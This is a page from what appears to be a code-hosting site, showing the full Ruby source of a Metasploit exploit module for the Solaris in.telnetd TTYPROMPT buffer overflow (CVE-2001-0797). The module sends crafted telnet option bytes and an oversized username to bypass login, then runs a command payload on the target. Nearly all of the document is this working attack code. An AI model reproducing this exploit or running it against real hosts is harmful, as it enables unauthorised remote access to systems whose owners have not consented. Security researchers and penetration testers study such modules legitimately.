Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
14
      'Description'    => %q{
15
        This module uses a buffer overflow in the Solaris 'login'
16
      application to bypass authentication in the telnet daemon.
17
      },
18
      'Author'         => [ 'MC', 'cazz' ],
19
      'License'        => MSF_LICENSE,
20
      'References'     =>
21
        [
22
          [ 'CVE', '2001-0797'],
23
          [ 'OSVDB', '690'],
24
          [ 'BID', '5531'],
25

26
        ],
27
      'Privileged'     => false,
28
      'Platform'       => %w{ solaris unix },
29
      'Arch'           => ARCH_CMD,
30
      'Payload'        =>
31
        {
32
          'Space'    => 2000,
33
          'BadChars' => '',
34
          'DisableNops' => true,
35
          'Compat'      =>
36
            {
37
              'PayloadType' => 'cmd',
38
              'RequiredCmd' => 'generic perl telnet',
39
            }
40
        },
41
      'Targets'        =>
42
        [
43
          ['Automatic', { }],
44
        ],
45
      'DisclosureDate' => '2002-01-18',
46
      'DefaultTarget' => 0))
47

48
      register_options(
49
        [
50
          Opt::RPORT(23),
51
          OptString.new('USER', [ true, "The username to use",     "bin" ]),
52
        ])
53
  end
54

55
  def exploit
56
    connect
57

58
    banner = sock.get_once
59

60
    print_status('Setting TTYPROMPT...')
61

62
    req =
63
      "\xff\xfc\x18" +
64
      "\xff\xfc\x1f" +
65
      "\xff\xfc\x21" +
66
      "\xff\xfc\x23" +
67
      "\xff\xfb\x22" +
68
      "\xff\xfc\x24" +
69
      "\xff\xfb\x27" +
70
      "\xff\xfb\x00" +
71
      "\xff\xfa\x27\x00" +
72
      "\x00TTYPROMPT" +
73
      "\x01" +
74
      rand_text_alphanumeric(6) +
75
      "\xff\xf0"
76

77
    sock.put(req)
78
    select(nil,nil,nil,0.25)
79

80
    print_status('Sending username...')
81

82
    filler = rand_text_alpha(rand(10) + 1)
83

84
    req << datastore['USER'] + (" #{filler}" * 65)
85

86
    sock.put(req + "\n\n\n")
87

88
    select(nil,nil,nil,0.25)
89
    sock.get_once
90

91
    sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
92

93
    select(nil,nil,nil,0.25)
94

95
    handler
96
  end
97
end
98

99